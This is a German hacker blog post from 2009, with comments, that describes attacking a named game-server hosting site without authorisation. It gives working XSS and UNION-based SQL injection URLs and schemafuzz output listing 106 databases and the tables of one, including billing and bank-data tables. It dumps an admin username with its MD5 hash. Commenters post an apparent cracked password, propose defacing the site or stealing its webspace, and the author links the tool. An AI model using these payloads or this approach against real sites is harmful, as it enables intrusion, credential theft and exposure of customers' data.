Header
Nov 30 2009

XSS & SQL-Injection @ Server-Crew.com

posted by J0hn.X3r Vulnerable Sites

Hab heut nach langer Zeit mal wieder eine SQL Injection durchgefuehrt, drauf gestoßen bin ich durch KoC seinem 1337 XSSed Profil.

Geht um die Seite Server-Crew.com – hier mal eine XSS Luecke:

http://server-crew.com/server-crew/index.php?show=<script>alert(1337)</script>

Dann dachte ich mir “wo ne XSS ist, wird auch nicht weit entfernt ne andere Vuln sein :P”, also paar Sekunden weiter gesucht und auf etwas gestoßen:

http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/version()-- f

Ausgabe:

5.0.32-Debian_7etch11

Nett. 🙂

Hab mir paar Dinge ausgeben lassen.. hab dann schnell gemerkt das dort einige DB’s sind. Daher nen Script benutzt (ich weiß, lame usw. Aber da ich die SQL Injection ja gefunden hab sollte das Script nur ein bisschen arbeit abnehmen ;))

Hier die Datenbanken:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v4.0  |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|
 
[+] URL:http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: gcp
	User: [email protected]
	Version: 5.0.32-Debian_7etch11
[+] Showing all databases current user has access too!
[+] Number of Databases: 106
 
[0]confixx
[1]gcp
[2]mumble
[3]mysql
[4]tss_13
[5]tss_9
[6]usr_web0_1
[7]usr_web0_2
[8]usr_web0_3
[9]usr_web0_4
[10]usr_web0_6
[11]usr_web0_8
[12]usr_web10_1
[13]usr_web12_1
[14]usr_web13_1
[15]usr_web14_1
[16]usr_web16_1
[17]usr_web17_1
[18]usr_web19_1
[19]usr_web19_2
[20]usr_web19_3
[21]usr_web19_4
[22]usr_web19_5
[23]usr_web1_1
[24]usr_web1_10
[25]usr_web1_11
[26]usr_web1_2
[27]usr_web1_3
[28]usr_web1_4
[29]usr_web1_5
[30]usr_web1_6
[31]usr_web1_7
[32]usr_web1_8
[33]usr_web1_9
[34]usr_web20_1
[35]usr_web21_1
[36]usr_web21_2
[37]usr_web21_3
[38]usr_web21_4
[39]usr_web21_5
[40]usr_web22_1
[41]usr_web23_1
[42]usr_web24_1
[43]usr_web26_1
[44]usr_web26_2
[45]usr_web28_1
[46]usr_web28_2
[47]usr_web29_1
[48]usr_web29_3
[49]usr_web2_1
[50]usr_web30_1
[51]usr_web30_2
[52]usr_web30_3
[53]usr_web30_4
[54]usr_web30_5
[55]usr_web31_1
[56]usr_web32_1
[57]usr_web33_1
[58]usr_web34_1
[59]usr_web34_2
[60]usr_web35_1
[61]usr_web37_1
[62]usr_web39_1
[63]usr_web39_2
[64]usr_web39_3
[65]usr_web39_4
[66]usr_web39_5
[67]usr_web39_6
[68]usr_web39_7
[69]usr_web3_1
[70]usr_web40_1
[71]usr_web40_2
[72]usr_web41_1
[73]usr_web41_2
[74]usr_web41_3
[75]usr_web43_1
[76]usr_web43_2
[77]usr_web44_1
[78]usr_web44_2
[79]usr_web46_1
[80]usr_web46_2
[81]usr_web47_1
[82]usr_web47_2
[83]usr_web47_3
[84]usr_web48_1
[85]usr_web49_1
[86]usr_web50_1
[87]usr_web50_2
[88]usr_web50_3
[89]usr_web50_4
[90]usr_web52_1
[91]usr_web52_2
[92]usr_web53_1
[93]usr_web54_1
[94]usr_web5_1
[95]usr_web5_2
[96]usr_web62_1
[97]usr_web62_2
[98]usr_web67_1
[99]usr_web8_1
[100]usr_web9_1
[101]usr_web9_2
[102]usr_web9_3
[103]usr_web9_4
[104]usr_web9_5
[105]usr_web9_6

Wer benutzt normalerweise “User: [email protected]“? Ist das nicht ein Sicherheitsrisiko? Anstatt das man nen eigenen User fuer die Page erstellt, alles ueber root machen?!

Doof.

Hier die Tabellen & Columns von der gcp DB:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v4.0  |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v4.0  |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|
 
[+] URL:http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: gcp
	User: [email protected]
	Version: 5.0.32-Debian_7etch11
[+] Showing Tables & Columns from database "gcp"
[+] Number of Tables: 91
 
[Database]: gcp
[Table: Columns]
[0]host_accounts: host_id,server_id,clan_id,insystem,aktiv,suspend,remove,passwd,mysql_pw,hd_quota,base_host,traffic,error,webalizer,auto_pay
[1]host_application: app_id,app_status,app_on_server,port_id,server_id,server_ip,maxplayers,server_type,ftp_passwd,ftp_login,quota,standby,game,game_group,server_type2,maxusers,webdownload,app_load,app_load_new,error_status,server_start,first_use,to_restart
[2]host_billing_accounts: account_id,account_name,account_owner,account_number,bank_number,account_currency,account_type,account_saldo
[3]host_billing_bills: bill_id,bill_customer,bill_date,bill_due_date,bill_content,bill_amount,bill_payment,bill_tax,bill_status,bill_payment_status
[4]host_billing_bills_orders: bill_id,order_id
[5]host_billing_imports: import_id,import_name,import_type,import_field_sep,import_field_start,import_field_posting_text,import_field_saldo,import_field_account,import_field_amount,import_field_date,import_field_date_format,import_field_currency,import_field_reason1,import_field_reason2,import_field_reason3,import_field_reason4,import_field_reason5
[6]host_billing_reminder: reminder_id,user_id,content,reminder_mail,reminder_post,reminder_amount
[7]host_billing_to_export: bill_id,exp_mail,exp_post,exp_print,exp_billing,exp_ec,exp_cc,exp_edit,exp_cancel,exp_delete
[8]host_billing_transactions: transaction_id,transaction_date,transaction_currency,transaction_amount,transaction_account,transaction_reason,transaction_posting_text,transaction_bank_account,transaction_key,transaction_hide,transaction_customer,transaction_bill,transaction_ignore,transaction_special,transaction_credit,transaction_credit_export,transaction_credit_id
[9]host_errors: error_id,server_id,error_cat,error_typ,error_msg,time
[10]host_events: event_id,server_id,event_typ,error_type,event_times,solved,target,error_id,content,content_show_user,modul,modul_id,time_start,time_last,time_solved,event_user,user_id,rep,process_id
[11]host_gameserver: gs_id,gs_status,gs_on_server,port_id,server_id,server_ip,maxplayers,server_type,ftp_passwd,standby,game,game_group,server_type2,maxusers,gs_load,gs_load_new,error_status,server_start,quota,webdownload,first_use,to_restart,timeserver,timeserver_last_check,timeserver_time_empty
[12]host_gs_admins: user_id,master,software,kunden,sources,join_iface,zahlungen,support,server,accounting_admin,accounting_view,accounting_edit,accounting_bill,support_server,support_kunden,events,news,notes1,notes2,newsletter
[13]host_gs_admins_notify: user_id,event_id,notify_status
[14]host_gs_aktuell: gs_id,game_id,mod_id,config_id,copy_config,modul_id,modul,process_id
[15]host_gs_checks: check_name,check_mode,check_value,check_type,modul_id,modul
[16]host_gs_config_file_defaults: config_file,config_group,os,text,mod_id,plugin_id,imp,parts_order
[17]host_gs_config_files: config_file,file,vars,game_id,mod_id,plugin_id,use_sections,section_start,section_end,section_num,filter_double
[18]host_gs_config_files_regexp: regexp_id,config_id,regexp_order,pattern,split,name,dels,imp
[19]host_gs_configs: gs_id,config_id,game_id,mod_id,name,info,last_change,modul_id,modul,process_id
[20]host_gs_dependency: dep_id,software_id,game_id,mod_id,plugin_id,version,typ,imp
[21]host_gs_games: game_id,game,game_name,game_group,default_port,port_offset,qport,qport_offset,qstat_opt,aktiv
[22]host_gs_installed: gs_id,game_id,mod_id,plugin_id,version,modul_id,process_id,modul,autoupdate
[23]host_gs_layout: page_id,mod_id,game_id,page_order,imp
[24]host_gs_layout_field_defaults: field_id,page_id,field_default,text_default,imp
[25]host_gs_layout_field_script: page_id,field_id,script,imp
[26]host_gs_layout_field_text: field_id,kommentar,imp
[27]host_gs_layout_field_values: field_id,gs_id,value,text,config_id,value_key
[28]host_gs_layout_field_vars: field_id,var,value,imp,var_key
[29]host_gs_layout_fields: field_id,page_id,field_os,mod_id,plugin_id,field_desc,name,field_regexp,field_mode,count,config_id,field_group,size,field_type,split,field_order,real_name,script,min,max,step,syntax,einheit,force_enter,default_enter,runtime_replace
[30]host_gs_layout_fields_check: field_id,check_name,check_console_send,check_console_recv,check_console_recv_pos,check_qstat_var,check_plugin_name,check_reaction_nostart,check_reaction_stop,check_reaction_suspend,check_reaction_notify_customer
[31]host_gs_layout_pages: page_id,name,page_type,php_file,aktiv,dir,info,script,imp_id
[32]host_gs_mappool: map_id,map_name,map_datum,map_cat,map_mod,map_win,map_linux,map_comment,map_os
[33]host_gs_mappool_cats: cat_id,mod_id,cat_name,cat_short
[34]host_gs_mappool_files: map_id,files,file_win,file_linux
[35]host_gs_mappool_installed: map_id,gs_id,mod_id,modul,modul_id
[36]host_gs_mods: mod_id,game_id,mod,mod_name,executable,executable_win,params,params_win,standartmap,gamedir,gamedir_win,mapdir,mapdir_win,logdir,logdir_win,execdir,execdir_win,aktiv,webcache,webcache_win
[37]host_gs_plugins: plugin_id,mod_id,game_id,plugin,plugin_name,plugin_typ,aktiv
[38]host_gs_server: server_id,server_ip,ftp_user,ftp_passwd,location,source_server,short_desc,load_max,load_act,os,content_url,ip_start,ip_end,error_status,arch,webdownload_url
[39]host_gs_server_software: server_id,modul
[40]host_gs_software: software_id,game_id,mod_id,plugin_id,version,standart_mods,standart_plugins,extract_dir,remove_path,kommentar,extract_dir_win,remove_path_win,aktiv,install_mode
[41]host_gs_users: gs_id,user_id,admin,config,ftp,user_game,stop,show_varnames
[42]host_host_stats: up,lastupdate,bin,bout,cpu,load1,load2,load3,ram,swap,procs_run,procs_sleep,temp1,temp2,temp3,temp4,fan1,fan2,fan3,fan4,server_id
[43]host_ips: ip_id,ip,ip1,ip2,ip3,ip4,server_id
[44]host_jobs: job_id,pid,job_type,job_server,job_status,prozent,name,job_daten,entered,started
[45]host_kunden: user_id,aktiv,k_alt,k_ansprache,k_vorname,k_nachname,k_strasse,k_plz,k_ort,k_land,k_geburtsdatum,k_tele,k_handy,k_fax,k_bank_inhaber,k_bank_kto_nr,k_bank_blz,k_bank_name,k_bank_zahlung,k_info,paypal_email,bill_tax,bill_post,bill_email_send,bill_text,bill_email
[46]host_kunden_bestellungen: bestellungs_id,user_id,produkt_id,tarif_id,features,bestell_time,erstfreischalt_zeit,kuendigungs_zeit,rechnungs_zeit,sponsoring,freigeschaltet,zahlungs_status,abrechnungsraum,letzte_rechnung,new,new_time,tarif_id_new,features_new,abrechnungsraum_new,tarif_id_set,features_set,abrechnungsraum_set,contract_term,first_bill,individual_monthly_price,individual_price_setup,individual_price_setup_set,individual_monthly_price_set,produkt_id_set,next_set,individual_price_setup_new,individual_monthly_price_new,produkt_id_new,order_ip
[47]host_kunden_bestellungen_features: bestell_id,feature_id,feature_status,setting
[48]host_kunden_bestellungen_indiv: bestell_id,temp_id,settings,status
[49]host_kunden_bestellungen_module: bestellungs_id,modul,modul_id,modul_nocheck,feature_id
[50]host_kunden_bestellungen_old: bestellungs_id,user_id,produkt_id,tarif_id,features,more_data,bemerkung,bestell_time,erstfreischalt_zeit,kuendigungs_zeit,freigeschaltet,zahlungs_status,abrechnungsraum
[51]host_kunden_konto: kunden_id,kontostand,last_change
[52]host_kunden_konto_zahlungen: zahlungs_id,kunden_id,betrag,typ,zweck,bemerkung,zeit,removed,rechnungs_id
[53]host_kunden_rechnungen: rechnungs_id,kunden_id,datum,rechnung,bezahlt,time,mail_send
[54]host_mail_queue: mail_id,mail_date,mail_to,mail_header,mail_subject,mail_body,event_id,mail_last_try
[55]host_module_checks: modul_id,modul,check_name,check_mode,check_value,check_type
[56]host_module_info_text: user_id,modul,modul_id,info_date,info_subject,info_text
[57]host_module_settings: server_id,setting,value,modul
[58]host_module_users: user_id,modul,modul_id,user_setting,user_value
[59]host_mysql: mysql_id,host_id,server_id,new,del
[60]host_news: news_id,user_id,news_datum,news_titel,news_text,news_force,news_public,news_replies
[61]host_news_com: com_id,news_id,com_datum,com_user,com_text,com_ip
[62]host_news_links: link_id,news_id,link_url,link_name
[63]host_php_ini: host_id,ini_var,ini_val
[64]host_produkt_feature_sets: feature_grp,feature_input,feature_display,feature_setting
[65]host_produkt_features: feature_id,tarif_id,feature_grp,feature_name,feature_preis,feature_preis_einmalig,feature_einstellung,feature_order,feature_status,feature_input
[66]host_produkt_tarife: tarif_id,produkt_id,tarif_name,tarif_desc,tarif_anzeigen,tarif_settings_show,tarif_order
[67]host_produkt_zusatz: zusatz_id,produkt_id,zusatz_text
[68]host_produkte: produkt_id,produkt_name,produkt_desc,produkt_games,produkt_anzeigen,produkt_grp,produkt_order
[69]host_server: server_id,server_ip,aktiv,host_space,template_acc,hosting,cluster,cluster_url
[70]host_sessions: session_id,user_id,ip,start,end,lang,session_server
[71]host_status_gameserver: gs_id,server_time,server_ip,server_port,server_qport,server_name,server_players,server_players_max,server_map,server_response,server_game,server_mod
[72]host_support_idents: ident_id,ident_user,ident_key,ident,ident2
[73]host_support_logs: log_id,log_type,log_key,log_date,log_type_id,log_user_id,log_subject
[74]host_support_logs_text: log_id,log_text
[75]host_support_notes: note_id,note_date,note_admin,note_text,note_key,note_todo,note_todo_status,note_todo_admin,note_todo_date,note_todo_date_done
[76]host_support_sessions: chat_id,user_id,time_start,time_end,chat_auth,chat_type,support_cat,user_ident,support_status,last_change,im_status
[77]host_support_sessions_supporters: user_id,login_key,last_online,online_since,time_last,user_status,online_status,last_change,admin_ip,admin_host
[78]host_support_sessions_text: msg_id,chat_id,user_ident,msg_time,msg_text
[79]host_support_sessions_users: chat_id,user_ident,user_id,user_ip,time_last,last_msg,user_name,user_status,user_admin,user_invis
[80]host_teamspeak: ts_id,ts_status,ts_load,port,server_id,process_id,server_desc,slots,codec_celp51,codec_celp63,codec_gsm148,codec_gsm164,codec_windowscelp52,codec_speex2150,codec_speex3950,codec_speex5950,codec_speex8000,codec_speex11000,codec_speex15000,codec_speex18200,codec_speex24600
[81]host_teamspeak_server: process_id,ts_status,server_id,server_ip,port_id,config_id,config_id_global,max_servers,max_slots,ftp_passwd,mysql_passwd,first_start,to_restart,server_start
[82]host_tickets: ticket_id,start,end,last,user_id,admin_id,replies,public,topic,rubrik,prioritaet,stat
[83]host_tickets_posts: post_id,ticket_id,user_id,post_time,post_ip,post_text
[84]host_tickets_rubriken: rubrik_id,rubrik_name
[85]host_todo: host_id,server_id,apache,mysql,php,ftp
[86]host_traffic: host_id,base_host,akt_traffic,ftp_traffic,cpmb,bezahlt
[87]host_traffic_ip: server_ip,zeit,bin,bout,hold
[88]host_updates: ident,version,datum
[89]host_users: user_id,username,user_password,user_actkey,user_newpasswd,user_level,user_last_login,user_last_ip
[90]host_users_details: user_id

Wenn wir nun unsere SQL Injection anpassen:

http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/concat_ws(0x3a,username,user_password)/**/FROM/**/gcp.host_users/**/LIMIT/**/0,1-- f

Dann ist unsere Ausgabe:

admin:97b6e1f38fe6c69d0057860f5e0e2105

Scheint aufm ersten Blick nen MD5 PW zu sein. Pwned?! Pwned! 😀

Najo, mehr werd ich da auch nicht machen, viel Spaß 😉


Lord [email protected] at 1. December 2009, 08:59

Oo böse böse nen md5 ist in 10 sekunden gecrackt nimm den lieber raus

blabliblub.. at 1. December 2009, 13:47

Pq5a18 hf..

Lord [email protected] at 1. December 2009, 13:53

ja ach 🙂

blabliblub.. at 1. December 2009, 13:57

Sollen ses halt defacen oder bla.. interessiert doch niemanden, sollen sie sich stolz fühlen.. 😮

Lord [email protected] at 1. December 2009, 14:00

warum defacen ?
man die haben webspage onmass da kann man sich ja wat abzweigen

J0hn.X3r at 1. December 2009, 17:16

Ist nicht mein Problem 😛

Lord [email protected] at 1. December 2009, 18:11

ok ich starte auf meinem Blog skynet jetzt ein projekt mit dem nammen sicheres inetenet im zuge dieses projekts werden sicherheits lüken gesucht und der admin informirt, wenn der nicht in der lage ist diese lücke zu schliesen defacen wir die seite und machen zo die user darauf aufmerksam 🙂
was haltet ihr davon ??

nzk at 2. December 2009, 22:39

@Ben
Keine sonderlich gute Idee ohne ausführliche Planung.

olol at 3. February 2010, 01:53

ben, lern erstmal schreiben… und dann denk drüber nach ob du nen blog aufmachen willst

~ at 21. November 2010, 21:53

Hast du vielleicht das Script für mich?

Grüße

J0hn.X3r at 21. November 2010, 22:49

Hallo,

Das Script gibts u.a. hier:

http://j0hnx3r.org/schemafuzz.py

J0hn.X3r

Flo at 9. August 2011, 22:04

äh blöde anfängerfrage, aber was für ein admin passwort war das, für was? und was bringt mir ein mysql passwort allgemein, wenn der server ohnehin nur auf 127.0.0.1:3306 lauscht und ich von außen nicht dran komm?


Write a comment

Comment